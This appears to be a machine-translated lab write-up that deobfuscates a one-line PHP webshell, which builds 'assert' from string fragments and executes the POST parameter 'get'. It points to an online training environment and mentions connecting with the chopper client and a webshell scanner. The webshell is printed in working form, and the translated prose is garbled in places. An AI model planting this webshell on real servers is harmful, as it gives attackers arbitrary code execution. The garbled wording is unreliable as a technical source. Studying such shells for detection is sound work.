WebShell traceable code analysis (c)
First, a word sample deformation horse
<?php $g = array('','s');$gg = a.$g[1].ser.chr('116');@$gg($_POST[get]);?>
Second, code analysis
1, to adjust the code format
2, analysis code
Analysis code, create a first array of g, then splicing the string, the string after the assignment to a splice gg variable, the process of splicing string: $ g [1] is s, chr ( '116') is t, so splicing after a string assert. Then the code word becomes a whole; injection <php @assert ($ _ POST [get])??>: @ Error suppression operator.
Third, the vulnerability environment to build
1, here using an experimental environment (WebShell code analysis traceable (Question 3)) online learning platform Mozi School, address:
https://www.mozhe.cn/bug/detail/S3FBSGhXYlU2a09ybG83UVRiQmJxUT09bW96aGUmozhe
2, code environment, download the code
3, analysis (analysis above has been passed)
4, connection using chopper
5, execute arbitrary code
Fourth, Postscript
Common learning webshell Scan Tool --- killing hippos WebShell killing site: http://www.shellpub.com/
Use killing hippos were webshell